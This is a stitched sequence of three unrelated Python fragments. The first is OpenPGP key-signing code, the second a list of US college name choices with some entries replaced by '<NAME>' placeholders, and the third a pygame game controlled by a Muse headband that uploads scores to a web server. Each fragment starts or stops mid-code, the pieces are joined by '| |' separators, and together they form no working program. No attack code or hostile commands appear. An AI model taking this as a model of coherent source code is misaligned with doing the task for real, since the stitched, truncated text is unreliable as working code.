return {KeyFlags.Certify} | user.selfsig.key_flags
return next(self.self_signatures).key_flags
def _sign(self, subject, sig, **prefs):
"""
The actual signing magic happens here.
:param subject: The subject to sign
:param sig: The :py:obj:`PGPSignature` object the new signature is to be encapsulated within
:returns: ``sig``, after the signature is added to it.
"""
user = prefs.pop('user', None)
uid = None
if user is not None:
uid = self.get_uid(user)
else:
uid = next(iter(self.userids), None)
if uid is None and self.parent is not None:
uid = next(iter(self.parent.userids), None)
if sig.hash_algorithm is None:
sig._signature.halg = next((h for h in uid.selfsig.hashprefs if h.is_supported), HashAlgorithm.SHA256)
if uid is not None and sig.hash_algorithm not in uid.selfsig.hashprefs:
warnings.warn("Selected hash algorithm not in key preferences", stacklevel=4)
# signature options that can be applied at any level
expires = prefs.pop('expires', None)
notation = prefs.pop('notation', None)
revocable = prefs.pop('revocable', True)
policy_uri = prefs.pop('policy_uri', None)
intended_recipients = prefs.pop('intended_recipients', [])
for intended_recipient in intended_recipients:
if isinstance(intended_recipient, PGPKey) and isinstance(intended_recipient._key, PubKeyV4):
sig._signature.subpackets.addnew('IntendedRecipient', hashed=True, version=4,
intended_recipient=intended_recipient.fingerprint)
elif isinstance(intended_recipient, Fingerprint):
# FIXME: what if it's not a v4 fingerprint?
sig._signature.subpackets.addnew('IntendedRecipient', hashed=True, version=4,
intended_recipient=intended_recipient)
else:
warnings.warn("Intended Recipient is not a PGPKey, ignoring")
if expires is not None:
# expires should be a timedelta, so if it's a datetime, turn it into a timedelta
if isinstance(expires, datetime):
expires = expires - self.created
sig._signature.subpackets.addnew('SignatureExpirationTime', hashed=True, expires=expires)
if revocable is False:
sig._signature.subpackets.addnew('Revocable', hashed=True, bflag=revocable)
if notation is not None:
for name, value in notation.items():
# mark all notations as human readable unless value is a bytearray
flags = NotationDataFlags.HumanReadable
if isinstance(value, bytearray):
flags = 0x00
sig._signature.subpackets.addnew('NotationData', hashed=True, flags=flags, name=name, value=value)
if policy_uri is not None:
sig._signature.subpackets.addnew('Policy', hashed=True, uri=policy_uri)
if user is not None and uid is not None:
signers_uid = "{:s}".format(uid)
sig._signature.subpackets.addnew('SignersUserID', hashed=True, userid=signers_uid)
# handle an edge case for timestamp signatures vs standalone signatures
if sig.type == SignatureType.Timestamp and len(sig._signature.subpackets._hashed_sp) > 1:
sig._signature.sigtype = SignatureType.Standalone
if prefs.pop('include_issuer_fingerprint', True):
if isinstance(self._key, PrivKeyV4):
sig._signature.subpackets.addnew('IssuerFingerprint', hashed=True, _version=4, _issuer_fpr=self.fingerprint)
sigdata = sig.hashdata(subject)
h2 = sig.hash_algorithm.hasher
h2.update(sigdata)
sig._signature.hash2 = bytearray(h2.digest()[:2])
_sig = self._key.sign(sigdata, getattr(hashes, sig.hash_algorithm.name)())
if _sig is NotImplemented:
raise NotImplementedError(self.key_algorithm)
sig._signature.signature.from_signer(_sig)
sig._signature.update_hlen()
return sig
@KeyAction(KeyFlags.Sign, is_unlocked=True, is_public=False)
def sign(self, subject, **prefs):
"""
Sign text, a message, or a timestamp using this key.
:param subject: The text to be signed
:type subject: ``str``, :py:obj:`~pgpy.PGPMessage`, ``None``
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is passphrase-protected and has not been unlocked
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is public
:returns: :py:obj:`PGPSignature`
The following optional keyword arguments can be used with :py:meth:`PGPKey.sign`, as well as
:py:meth:`PGPKey.certify`, :py:meth:`PGPKey.revoke`, and :py:meth:`PGPKey.bind`:
:keyword expires: Set an expiration date for this signature
:type expires: :py:obj:`~datetime.datetime`, :py:obj:`~datetime.timedelta`
:keyword notation: Add arbitrary notation data to this signature.
:type notation: ``dict``
:keyword policy_uri: Add a URI to the signature that should describe the policy under which the signature
was issued.
:type policy_uri: ``str``
:keyword revocable: If ``False``, this signature will be marked non-revocable
:type revocable: ``bool``
:keyword user: Specify which User ID to use when creating this signature. Also adds a "Signer's User ID"
to the signature.
:type user: ``str``
:keyword created: Specify the time that the signature should be made. If unset or None,
it will use the present time.
:type created: :py:obj:`~datetime.datetime`
:keyword intended_recipients: Specify a list of :py:obj:`PGPKey` objects that will be encrypted to.
:type intended_recipients: ``list``
:keyword include_issuer_fingerprint: Whether to include a hashed subpacket indicating the issuer fingerprint.
(only for v4 keys, defaults to True)
:type include_issuer_fingerprint: ``bool``
"""
sig_type = SignatureType.BinaryDocument
hash_algo = prefs.pop('hash', None)
if subject is None:
sig_type = SignatureType.Timestamp
if isinstance(subject, PGPMessage):
if subject.type == 'cleartext':
sig_type = SignatureType.CanonicalDocument
subject = subject.message
sig = PGPSignature.new(sig_type, self.key_algorithm, hash_algo, self.fingerprint.keyid, created=prefs.pop('created', None))
return self._sign(subject, sig, **prefs)
@KeyAction(KeyFlags.Certify, is_unlocked=True, is_public=False)
def certify(self, subject, level=SignatureType.Generic_Cert, **prefs):
"""
certify(subject, level=SignatureType.Generic_Cert, **prefs)
Sign a key or a user id within a key.
:param subject: The user id or key to be certified.
:type subject: :py:obj:`PGPKey`, :py:obj:`PGPUID`
:param level: :py:obj:`~constants.SignatureType.Generic_Cert`, :py:obj:`~constants.SignatureType.Persona_Cert`,
:py:obj:`~constants.SignatureType.Casual_Cert`, or :py:obj:`~constants.SignatureType.Positive_Cert`.
Only used if subject is a :py:obj:`PGPUID`; otherwise, it is ignored.
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is passphrase-protected and has not been unlocked
:raises: :py:exc:`~pgpy.errors.PGPError` if the key is public
:returns: :py:obj:`PGPSignature`
In addition to the optional keyword arguments accepted by :py:meth:`PGPKey.sign`, the following optional
keyword arguments can be used with :py:meth:`PGPKey.certify`.
These optional keywords only make sense, and thus only have an effect, when self-signing a key or User ID:
:keyword usage: A | |
Francis University"),
("Saint Gregory's University","Saint Gregory's University"),
("Saint John Fisher College","Saint John Fisher College"),
("Saint John Vianney College Seminary","Saint John Vianney College Seminary"),
("Saint John's Seminary","Saint John's Seminary"),
("Saint Johns River State College","Saint Johns River State College"),
("Saint Johns University","Saint Johns University"),
("Saint Joseph Seminary College","Saint Joseph Seminary College"),
("Saint Joseph's College of Maine","Saint Joseph's College of Maine"),
("Saint Joseph's College-New York","Saint Joseph's College-New York"),
("Saint Joseph's University","Saint Joseph's University"),
("Saint Josephs College","Saint Josephs College"),
("Saint Leo University","Saint Leo University"),
("Saint Louis Christian College","Saint Louis Christian College"),
("Saint Louis Community College","Saint Louis Community College"),
("Saint Louis University","Saint Louis University"),
("Saint Luke's College of Health Sciences","Saint Luke's College of Health Sciences"),
("Saint Martin's University","Saint Martin's University"),
("Saint Mary's College of California","Saint Mary's College of California"),
("Saint Mary's College","Saint Mary's College"),
("Saint Mary's University of Minnesota","Saint Mary's University of Minnesota"),
("Saint Mary-of-the-Woods College","Saint Mary-of-the-Woods College"),
("Saint Meinrad School of Theology","Saint Meinrad School of Theology"),
("Saint Michael's College","Saint Michael's College"),
("Saint Norbert College","Saint Norbert College"),
("Saint Patrick's Seminary and University","Saint Patrick's Seminary and University"),
("Saint Paul College","Saint Paul College"),
("Saint Paul School of Theology","Saint Paul School of Theology"),
("Saint Pauls College","Saint Pauls College"),
("Saint Peter's University","Saint Peter's University"),
("Saint Vincent College","Saint Vincent College"),
("Saint Vincent Seminary","Saint Vincent Seminary"),
("Saint Vincent de Paul Regional Seminary","Saint Vincent de Paul Regional Seminary"),
("Saint Vladimirs Orthodox Theological Seminary","Saint Vladimirs Orthodox Theological Seminary"),
("Saint Xavier University","Saint Xavier University"),
("Salem College of Hairstyling","Salem College of Hairstyling"),
("Salem College","Salem College"),
("Salem Community College","Salem Community College"),
("Salem International University","Salem International University"),
("Salem State University","Salem State University"),
("Salina Area Technical College","Salina Area Technical College"),
("Salinas Beauty College Inc","Salinas Beauty College Inc"),
("Saline County Career Center","Saline County Career Center"),
("Salisbury University","Salisbury University"),
("Salish Kootenai College","Salish Kootenai College"),
("Salon & Spa Institute","Salon & Spa Institute"),
("Salon 496 Barber Academy","Salon 496 Barber Academy"),
("Salon Academy","Salon Academy"),
("Salon Professional Academy","Salon Professional Academy"),
("Salon Success Academy-Corona","Salon Success Academy-Corona"),
("Salon Success Academy-Fontana","Salon Success Academy-Fontana"),
("Salon Success Academy-Redlands","Salon Success Academy-Redlands"),
("Salon Success Academy-San Bernardino","Salon Success Academy-San Bernardino"),
("Salon Success Academy-Upland","Salon Success Academy-Upland"),
("Salt Lake Baptist College","Salt Lake Baptist College"),
("Salt Lake Community College","Salt Lake Community College"),
("Salter College-Chicopee","Salter College-Chicopee"),
("Salter College-West Boylston","Salter College-West Boylston"),
("Salter School of Nursing and Allied Health","Salter School of Nursing and Allied Health"),
("Salter School-Fall River","Salter School-Fall River"),
("Salter School-New Bedford","Salter School-New Bedford"),
("Salus University","Salus University"),
("Salve Regina University","Salve Regina University"),
("Sam Houston State University","Sam Houston State University"),
("Samaritan Hospital School of Nursing","Samaritan Hospital School of Nursing"),
("Samford University","Samford University"),
("Sampson Community College","Sampson Community College"),
("Samuel Merritt University","Samuel Merritt University"),
("San Antonio College","San Antonio College"),
("San Bernardino Community College District","San Bernardino Community College District"),
("San Bernardino Valley College","San Bernardino Valley College"),
("San Diego Christian College","San Diego Christian College"),
("San Diego City College","San Diego City College"),
("San Diego College","San Diego College"),
("San Diego Community College District-District Office","San Diego Community College District-District Office"),
("San Diego Continuing Education","San Diego Continuing Education"),
("San Diego Culinary Institute","San Diego Culinary Institute"),
("San Diego Mesa College","San Diego Mesa College"),
("San Diego Miramar College","San Diego Miramar College"),
("San Diego State University","San Diego State University"),
("San Diego State University-Imperial Valley Campus","San Diego State University-Imperial Valley Campus"),
("San Francisco Art Institute","San Francisco Art Institute"),
("San Francisco Conservatory of Music","San Francisco Conservatory of Music"),
("San Francisco Institute of Esthetics and Cosmetology","San Francisco Institute of Esthetics and Cosmetology"),
("San Francisco State University","San Francisco State University"),
("San Francisco Theological Seminary","San Francisco Theological Seminary"),
("San Jacinto Community College","San Jacinto Community College"),
("San Joaquin College of Law","San Joaquin College of Law"),
("San Joaquin Delta College","San Joaquin Delta College"),
("San Joaquin Valley College-Bakersfield","San Joaquin Valley College-Bakersfield"),
("San Joaquin Valley College-Central Administrative Office","San Joaquin Valley College-Central Administrative Office"),
("San Joaquin Valley College-Fresno Aviation","San Joaquin Valley College-Fresno Aviation"),
("San Joaquin Valley College-Fresno","San Joaquin Valley College-Fresno"),
("San Joaquin Valley College-Hesperia","San Joaquin Valley College-Hesperia"),
("San Joaquin Valley College-Lancaster","San Joaquin Valley College-Lancaster"),
("San Joaquin Valley College-Modesto","San Joaquin Valley College-Modesto"),
("San Joaquin Valley College-Ontario","San Joaquin Valley College-Ontario"),
("San Joaquin Valley College-Rancho Cordova","San Joaquin Valley College-Rancho Cordova"),
("San Joaquin Valley College-San Diego","San Joaquin Valley College-San Diego"),
("San Joaquin Valley College-Temecula","San Joaquin Valley College-Temecula"),
("San Joaquin Valley College-Visalia","San Joaquin Valley College-Visalia"),
("San Jose City College","San Jose City College"),
("San Jose State University","San Jose State University"),
("San Jose-Evergreen Community College District","San Jose-Evergreen Community College District"),
("San Juan Bautista School of Medicine","San Juan Bautista School of Medicine"),
("San Juan College","San Juan College"),
("San Mateo County Community College District Office","San Mateo County Community College District Office"),
("Sandhills Community College","Sandhills Community College"),
("Sandusky Career Center","Sandusky Career Center"),
("Sanford College of Nursing","Sanford College of Nursing"),
("Sanford Medical Center","Sanford Medical Center"),
("Sanford-Brown College-Atlanta","Sanford-Brown College-Atlanta"),
("Sanford-Brown College-Austin","Sanford-Brown College-Austin"),
("Sanford-Brown College-Boston","Sanford-Brown College-Boston"),
("Sanford-Brown College-Collinsville","Sanford-Brown College-Collinsville"),
("Sanford-Brown College-Columbus","Sanford-Brown College-Columbus"),
("Sanford-Brown College-Dallas","Sanford-Brown College-Dallas"),
("Sanford-Brown College-Dearborn","Sanford-Brown College-Dearborn"),
("Sanford-Brown College-Farmington","Sanford-Brown College-Farmington"),
("Sanford-Brown College-Fenton","Sanford-Brown College-Fenton"),
("Sanford-Brown College-Grand Rapids","Sanford-Brown College-Grand Rapids"),
("Sanford-Brown College-Hazelwood","Sanford-Brown College-Hazelwood"),
("Sanford-Brown College-Hillside","Sanford-Brown College-Hillside"),
("Sanford-Brown College-Houston North Loop","Sanford-Brown College-Houston North Loop"),
("Sanford-Brown College-Houston","Sanford-Brown College-Houston"),
("Sanford-Brown College-Indianapolis","Sanford-Brown College-Indianapolis"),
("Sanford-Brown College-Middleburg Heights","Sanford-Brown College-Middleburg Heights"),
("Sanford-Brown College-Phoenix","Sanford-Brown College-Phoenix"),
("Sanford-Brown College-Portland","Sanford-Brown College-Portland"),
("Sanford-Brown College-San Antonio","Sanford-Brown College-San Antonio"),
("Sanford-Brown College-Skokie","Sanford-Brown College-Skokie"),
("Sanford-Brown College-St Peters","Sanford-Brown College-St Peters"),
("Sanford-Brown College-Tinley Park","Sanford-Brown College-Tinley Park"),
("Sanford-Brown College-Tysons Corner","Sanford-Brown College-Tysons Corner"),
("Sanford-Brown College-West Allis","Sanford-Brown College-West Allis"),
("Sanford-Brown Institute-Cranston","Sanford-Brown Institute-Cranston"),
("Sanford-Brown Institute-Ft Lauderdale","Sanford-Brown Institute-Ft Lauderdale"),
("Sanford-Brown Institute-Garden City","Sanford-Brown Institute-Garden City"),
("Sanford-Brown Institute-Iselin","Sanford-Brown Institute-Iselin"),
("Sanford-Brown Institute-Jacksonville","Sanford-Brown Institute-Jacksonville"),
("Sanford-Brown Institute-Landover","Sanford-Brown Institute-Landover"),
("Sanford-Brown Institute-New York","Sanford-Brown Institute-New York"),
("Sanford-Brown Institute-Orlando","Sanford-Brown Institute-Orlando"),
("Sanford-Brown Institute-Pittsburgh","Sanford-Brown Institute-Pittsburgh"),
("Sanford-Brown Institute-Tampa","Sanford-Brown Institute-Tampa"),
("Sanford-Brown Institute-Trevose","Sanford-Brown Institute-Trevose"),
("Sanford-Brown Institute-White Plains","Sanford-Brown Institute-White Plains"),
("Sanford-Brown Institute-Wilkins Township","Sanford-Brown Institute-Wilkins Township"),
("Sanford-Burnham Medical Research Institute","Sanford-Burnham Medical Research Institute"),
("Santa Ana Beauty Academy","Santa Ana Beauty Academy"),
("Santa Ana Beauty College","Santa Ana Beauty College"),
("Santa Ana College","Santa Ana College"),
("Santa Barbara Business College-Bakersfield","Santa Barbara Business College-Bakersfield"),
("Santa Barbara Business College-Santa Maria","Santa Barbara Business College-Santa Maria"),
("Santa Barbara Business College-Ventura","Santa Barbara Business College-Ventura"),
("Santa Barbara City College","Santa Barbara City College"),
("Santa Clara University","Santa Clara University"),
("Santa Fe College","Santa Fe College"),
("Santa Fe Community College","Santa Fe Community College"),
("Santa Fe University of Art and Design","Santa Fe University of Art and Design"),
("Santa Monica College","Santa Monica College"),
("Santa Rosa Junior College","Santa Rosa Junior College"),
("Santiago Canyon College","Santiago Canyon College"),
("<NAME> College","Sarah Lawrence College"),
("Sarasota County Technical Institute","Sarasota County Technical Institute"),
("Sarasota School of Massage Therapy","Sarasota School of Massage Therapy"),
("Sauk Valley Community College","Sauk Valley Community College"),
("Savannah College of Art and Design","Savannah College of Art and Design"),
("Savannah Law School","Savannah Law School"),
("Savannah State University","Savannah State University"),
("Savannah Technical College","Savannah Technical College"),
("Saybrook University","Saybrook University"),
("Schenectady County Community College","Schenectady County Community College"),
("Schiller International University","Schiller International University"),
("Schilling-Douglas School of Hair Design","Schilling-Douglas School of Hair Design"),
("Scholars Cosmetology University","Scholars Cosmetology University"),
("School of Automotive Machinists","School of Automotive Machinists"),
("School of Court Reporting","School of Court Reporting"),
("School of Health","School of Health"),
("School of Missionary Aviation Technology","School of Missionary Aviation Technology"),
("School of Professional Horticulture at the New York Botanical Garden","School of Professional Horticulture at the New York Botanical Garden"),
("School of Visual Arts","School of Visual Arts"),
("School of the Art Institute of Chicago","School of the Art Institute of Chicago"),
("School of the Museum of Fine Arts-Boston","School of the Museum of Fine Arts-Boston"),
("Schoolcraft College","Schoolcraft College"),
("Schreiner University","Schreiner University"),
("Schuyler Steuben Chemung Tioga Allegany BOCES","Schuyler Steuben Chemung Tioga Allegany BOCES"),
("Schuylkill Technology Center","Schuylkill Technology Center"),
("Scioto County Career Technical Center","Scioto County Career Technical Center"),
("Scott College of Cosmetology","Scott College of Cosmetology"),
("Scottsdale Community College","Scottsdale Community College"),
("Scripps College","Scripps College"),
("Seabury-Western Theological Seminary","Seabury-Western Theological Seminary"),
("Seacoast Career School-Manchester Campus","Seacoast Career School-Manchester Campus"),
("Seacoast Career Schools-Sanford Campus","Seacoast Career Schools-Sanford Campus"),
("Searcy Beauty College Inc","Searcy Beauty College Inc"),
("Seattle Central College","Seattle Central College"),
("Seattle Community College-North Campus","Seattle Community College-North Campus"),
("Seattle Community College-South Campus","Seattle Community College-South Campus"),
("Seattle Institute of Oriental Medicine","Seattle Institute of Oriental Medicine"),
("Seattle Pacific University","Seattle Pacific University"),
("Seattle University","Seattle University"),
("Seattle Vocational Institute","Seattle Vocational Institute"),
("Sebring Career Schools-Houston","Sebring Career Schools-Houston"),
("Sebring Career Schools-Huntsville","Sebring Career Schools-Huntsville"),
("Seguin Beauty School-New Braunfels","Seguin Beauty School-New Braunfels"),
("Seguin Beauty School-Seguin","Seguin Beauty School-Seguin"),
("Selma University","Selma University"),
("<NAME>","<NAME>"),
("<NAME>","<NAME> de Puerto Rico"),
("Seminole State College of Florida","Seminole State College of Florida"),
("Seminole State College","Seminole State College"),
("Sentara College of Health Sciences","Sentara College of Health Sciences"),
("Serbias Technical College","Serbias Technical College"),
("Sessions College for Professional Design","Sessions College for Professional Design"),
("Seton Hall University","Seton Hall University"),
("Seton Hill University","Seton Hill University"),
("Sewanee-The University of the South","Sewanee-The University of the South"),
("Seward County Community College and Area Technical School","Seward County Community College and Area Technical School"),
("Seymour Beauty Academy","Seymour Beauty Academy"),
("Sh'or Yoshuv Rabbinical College","Sh'or Yoshuv Rabbinical College"),
("Sharon Regional Health System School of Nursing","Sharon Regional Health System School of Nursing"),
("Sharp Edgez Barber Institute","Sharp Edgez Barber Institute"),
("Sharps Academy of Hair Styling","Sharps Academy of Hair Styling"),
("Shasta Bible College and Graduate School","Shasta Bible College and Graduate School"),
("Shasta College","Shasta College"),
("Shasta School of Cosmetology","Shasta School of Cosmetology"),
("Shaw University","Shaw University"),
("Shawnee Beauty College","Shawnee Beauty College"),
("Shawnee Community College","Shawnee Community College"),
("Shawnee State University","Shawnee State University"),
("Shawsheen Valley Regional Vocational Technical School","Shawsheen Valley Regional Vocational Technical School"),
("Shear Academy","Shear Academy"),
("Shear Ego International School of Hair Design","Shear Ego International School of Hair Design"),
("Shear Excellence Hair Academy","Shear Excellence Hair Academy"),
("Shear Finesse Hairstyling Academy","Shear Finesse Hairstyling Academy"),
("Shear Learning Academy of Cosmetology","Shear Learning Academy of Cosmetology"),
("Shelton State Community College","Shelton State Community College"),
("Shenandoah University","Shenandoah University"),
("Shepherd University","Shepherd University"),
("Shepherds College","Shepherds College"),
("Shepherds Theological Seminary","Shepherds Theological Seminary"),
("Sheridan College","Sheridan College"),
("Sheridan Technical Center","Sheridan Technical Center"),
("Sherman | |
import pygame, random, sys, os, time, math
import numpy as np
from pygame.locals import *
import _thread as thread
import argparse
import multiprocessing # for processing osc stream
from pythonosc import dispatcher as dsp
from pythonosc import osc_server
from pythonosc import udp_client
import urllib.request
import json
import io
import threading
from urllib import parse
fullscreen = True
hasOscRunning = False
event = multiprocessing.Event()
scale = 2
WINDOWWIDTH = int(450 * scale)
WINDOWHEIGHT = int(800 * scale)
TEXTCOLOR = (255, 255, 255)
BACKGROUNDCOLOR = (0, 0, 0)
MASKCOLOR = (0, 0, 0, 180)
WHITECOLOR = (255, 255, 255)
FPS = 60
BADDIEMINSIZE = 10
BADDIEMAXSIZE = 40
BADDIESPEED = 8
MINADDNEWBADDIERATE = 107
MAXADDNEWBADDIERATE = 87
MINADDNEWSTARRATE = 20
MAXADDNEWSTARRATE = 10
INITPLAYERMOVERATE = 5
PLAYERMOVERATE = 5
GAMEDURATION = 60 # game duration
IMAGE_WIDTH = 45
WHOLE_IMAGE_WIDTH = 60
scale = 1
count=3
# for muse tracking
playerRect = None
gameParams = None
oscProcess = None
concenList = []
MINY = -0.5
MAXY = 1
connectUser = None
clientId = None
returnCallback = None
PLAYER_MIN_X = int(55 * scale)
PLAYER_MAX_X = WINDOWWIDTH - PLAYER_MIN_X
min_x = 120
max_x = WINDOWWIDTH - 35
x_data = list(range(min_x, max_x, int((max_x-min_x)/IMAGE_WIDTH)))
ALL_DATA = []
def concen_handler(unused_addr, args, value):
if oscProcess is None:
return
#speed = (1-value) * 30
#speed = max(value, 1) * 30
value = value + 2
value = min(value, 4)
value = max(value, 0)
value = value / 4
speed = value * 20
# update beta values
beta = args[0]['beta']
beta.insert(len(beta), value)
beta.remove(beta[0])
args[0]['beta'] = beta
# calculate speed
speed = min(speed, 30)
speed = max(speed, 10)
args[0]['speed'] = speed
args[0]['concen'] = value * 100
event.set()
def acc_handler(unused_addr, args, x, y, z):
# normalize y
global WINDOWWIDTH, playerRect
rate = (y - MINY) / (MAXY - MINY)
if rate > 1:
rate = 1
if rate < 0:
rate = 0
x = WINDOWWIDTH * rate + 30
args[0]['left'] = PLAYER_MIN_X + x
event.set()
def start_osc(ip, port, info):
global hasOscRunning
time.sleep(5)
dispatcher = dsp.Dispatcher()
#dispatcher.map("/muse/algorithm/concentration", concen_handler, info)
dispatcher.map("/muse/elements/delta_absolute", concen_handler, info)
dispatcher.map("/muse/acc", acc_handler, info)
server = osc_server.ThreadingOSCUDPServer(
(ip, port), dispatcher)
print("Serving on {}".format(server.server_address))
hasOscRunning = True
server.serve_forever()
def terminate():
global oscProcess, clientId, connectUser, returnCallback, count
if connectUser:
response = urllib.request.urlopen('https://forrestlin.cn/games/closeConnection/%s/%s'%(clientId, connectUser['userId']))
res = response.read().decode('utf-8')
resJson = json.loads(res)
if not resJson['success']:
print('Failed to close connection, reason: %s'%resJson['errMsg'])
else:
print('Succeed to close connection')
if oscProcess is not None:
oscProcess.terminate()
oscProcess = None
pygame.quit()
count = 3
# go back the startup page
if returnCallback:
returnCallback()
else:
sys.exit()
def sampleAllData():
global ALL_DATA
if len(ALL_DATA) < WHOLE_IMAGE_WIDTH:
return
step = int(len(ALL_DATA) / WHOLE_IMAGE_WIDTH)
data = []
for i in range(0, len(ALL_DATA), step):
if len(data) >= WHOLE_IMAGE_WIDTH:
break
data.append(ALL_DATA[int(i)])
ALL_DATA = data
def waitForPlayerToPressKey():
while True:
for event in pygame.event.get():
if event.type == QUIT:
terminate()
if event.type == KEYDOWN:
if event.key == K_ESCAPE: #escape quits
terminate()
return
def playerHasHitBaddie(playerRect, baddies):
for b in baddies:
if playerRect.colliderect(b['rect']):
return True
return False
def playerHasHitStar(playerRect, stars):
for s in stars:
if playerRect.colliderect(s['rect']):
stars.remove(s)
return True
return False
def drawText(text, font, surface, x, y, textColor=TEXTCOLOR):
textobj = font.render(text, 1, textColor)
textrect = textobj.get_rect()
textrect.topleft = (x, y)
surface.blit(textobj, textrect)
def uploadScore(score, concenList):
global clientId, connectUser, ALL_DATA
if connectUser == None:
return
waves = ALL_DATA
waves = [max(i , 0.05) * 10 for i in waves]
avgCon = 80
if len(concenList) > 0:
avgCon = sum(concenList) / len(concenList)
avgCon = min(avgCon, 100)
data = {'clientId': clientId, 'userId': connectUser['userId'], 'score': score, 'concen': avgCon, 'waves': ','.join(map(str, waves))}
data = parse.urlencode(data).encode('utf-8')
if clientId is not None and connectUser is not None:
response = urllib.request.urlopen('https://forrestlin.cn/games/finishGame', data=data)
res = response.read().decode('utf-8')
resJson = json.loads(res)
if not resJson['success']:
print('Failed to upload score, reason: %s'%resJson['errMsg'])
else:
print('Succeed to upload score')
def drawLines(surface, x_data, y_data):
global ALL_DATA
max_y = 36
points = []
ALL_DATA.append(y_data[-1])
r = len(x_data) if len(y_data) > len(x_data) else len(y_data)
for i in range(r):
y_data[i] = max_y * (1-y_data[i])
points.append((x_data[i], y_data[i]))
if len(points) > 0:
linerect = pygame.draw.aalines(surface, (255, 255, 255), False, points, 5)
linerect.topleft = (0, 0)
pygame.display.flip()
def drawWholeLines(surface, baseline):
global gameParams, WINDOWHEIGHT, ALL_DATA
points = []
min_x = int((WINDOWWIDTH - 313) / 2 + 20)
max_x = int(WINDOWWIDTH - (WINDOWWIDTH - 313) / 2 - 20)
waves = [0.5]
waves.extend(ALL_DATA)
x_data = list(range(min_x, max_x, int((max_x-min_x)/WHOLE_IMAGE_WIDTH)))
r = min(len(x_data), len(waves))
for i in range(r):
if waves[i] > 1:
print("illegal wave %.2f"%waves[i])
waves[i] = min(1, waves[i])
waves[i] = max(0, waves[i])
points.append((x_data[i], baseline + (waves[i]) * 100))
if len(points) > 0:
linerect = pygame.draw.aalines(surface, (255, 255, 255), False, points, 5)
linerect.topleft = (0, 0)
pygame.display.flip()
def doCounting(windowSurface, seconds):
global fullscreen
clock = pygame.time.Clock()
counter, text = seconds, str(seconds).rjust(3)
num_font = pygame.font.Font("./fonts/TTTGB-Medium.ttf", 120)
appleTipsFont = pygame.font.Font('./fonts/PingFang-Jian-ChangGuiTi-2.ttf', 30)
game_explain = pygame.image.load('image/game_explaination.png')
game_explain = pygame.transform.scale(game_explain, (280, 115))
pygame.time.set_timer(pygame.USEREVENT, 1000)
while True:
for e in pygame.event.get():
if e.type == pygame.USEREVENT:
counter -= 1
text = str(counter).rjust(3) if counter > 0 else "begin!"
if e.type == QUIT:
terminate()
if e.type == KEYDOWN:
if e.key == K_ESCAPE: #escape quits
terminate()
if e.key==ord('f'):
fullscreen=not fullscreen
if fullscreen:
windowSurface=pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)
else:
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), RESIZABLE, 32)
if counter <= 0:
break
else:
windowSurface.fill((0, 0, 0))
drawText(text, num_font, windowSurface, (WINDOWWIDTH / 2) - 145, (WINDOWHEIGHT / 3))
drawText('左右摆动头部控制滑板', appleTipsFont, windowSurface, (WINDOWWIDTH / 2) - 150, (WINDOWHEIGHT / 2))
windowSurface.blit(game_explain, (WINDOWWIDTH / 2 - 150, WINDOWHEIGHT / 2 + 60))
windowSurface.blit(num_font.render(text, True, (0, 0, 0)), (32, 48))
pygame.display.flip()
clock.tick(60)
continue
break
def game():
global playerRect, gameParams, count, connectUser, clientId, concenList, WINDOWHEIGHT, WINDOWWIDTH, IMAGE_WIDTH, max_x, x_data, fullscreen
starttime = None # for timing
endtime = None
# set up pygame, the window, and the mouse cursor
pygame.init()
mainClock = pygame.time.Clock()
displayInfo = pygame.display.Info()
# if displayInfo.current_h / WINDOWHEIGHT > displayInfo.current_w / WINDOWWIDTH:
# # fit width
# scale = displayInfo.current_w / WINDOWWIDTH
# WINDOWHEIGHT = int(scale * WINDOWHEIGHT)
# WINDOWWIDTH = displayInfo.current_w
# else:
# # fit height
# scale = displayInfo.current_h / WINDOWHEIGHT
# WINDOWWIDTH = int(scale * WINDOWWIDTH)
# WINDOWHEIGHT = displayInfo.current_h
max_x = WINDOWWIDTH - 35
x_data = list(range(min_x, max_x, int((max_x-min_x)/IMAGE_WIDTH)))
#windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), pygame.FULLSCREEN)
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), RESIZABLE, 32)
pygame.display.set_caption('意念滑板赛')
pygame.mouse.set_visible(False)
# fonts
font = pygame.font.Font("./fonts/TTTGB-Medium.ttf", 20)
appleFont = pygame.font.Font("./fonts/TTTGB-Medium.ttf", 28)
appleTipsFont = pygame.font.Font('./fonts/PingFang-Jian-ChangGuiTi-2.ttf', 14)
appleTitleFont = pygame.font.Font('./fonts/PingFang-Jian-ChangGuiTi-2.ttf', 16)
scoreFont = pygame.font.Font('./fonts/TTTGB-Medium.ttf', 12)
# sounds
pygame.mixer.init()
gameOverSound = pygame.mixer.Sound('music/gameover.wav')
pygame.mixer.music.load('music/technicolordreams.mp3')
laugh = pygame.mixer.Sound('music/laugh.wav')
reward = pygame.mixer.Sound('music/reward.wav')
# images
playerImage = pygame.image.load('image/skateboard.png')
playerImage = pygame.transform.scale(playerImage, (int(60 * scale), int(70 * scale)))
car2 = pygame.image.load('image/shit.png')
# car3 = pygame.image.load('image/shoe2.png')
# load the player avatar and nickname
avatarImg, nickName = None, "匿名玩家"
if connectUser:
print(connectUser)
avatarUrl = connectUser['avatar']
avatarStr = urllib.request.urlopen(avatarUrl).read()
avatarImg = pygame.image.load(io.BytesIO(avatarStr))
nickName = connectUser['nickname']
else:
avatarImg = pygame.image.load('image/user_unlogin.png')
avatarImg = pygame.transform.scale(avatarImg, (50, 50))
playerRect = playerImage.get_rect()
shoe1 = pygame.image.load('image/shoe1.png')
shoe2 = pygame.image.load('image/shoe2.png')
barriers = [car2]
shoes = [shoe1, shoe2]
background = pygame.image.load('image/game_bg.jpg')
wavebg = pygame.image.load('image/wave_bg.png')
wavebg = pygame.transform.scale(wavebg, (WINDOWWIDTH, 63))
leftupBg = pygame.image.load('image/leftup_bg.png')
leftupBg = pygame.transform.scale(leftupBg, (119, 63))
rightupBg = pygame.image.load('image/rightup_bg.png')
rightupBg = pygame.transform.scale(rightupBg, (62, 63))
scoreBg = pygame.image.load('image/score_bg.png')
scoreBg = pygame.transform.scale(scoreBg, (313, 431))
scoreShoe = pygame.transform.scale(shoe2, (50, 50))
# "Start" screen
#drawText('Press any key', font, windowSurface, (WINDOWWIDTH / 3) - 30, (WINDOWHEIGHT / 3))
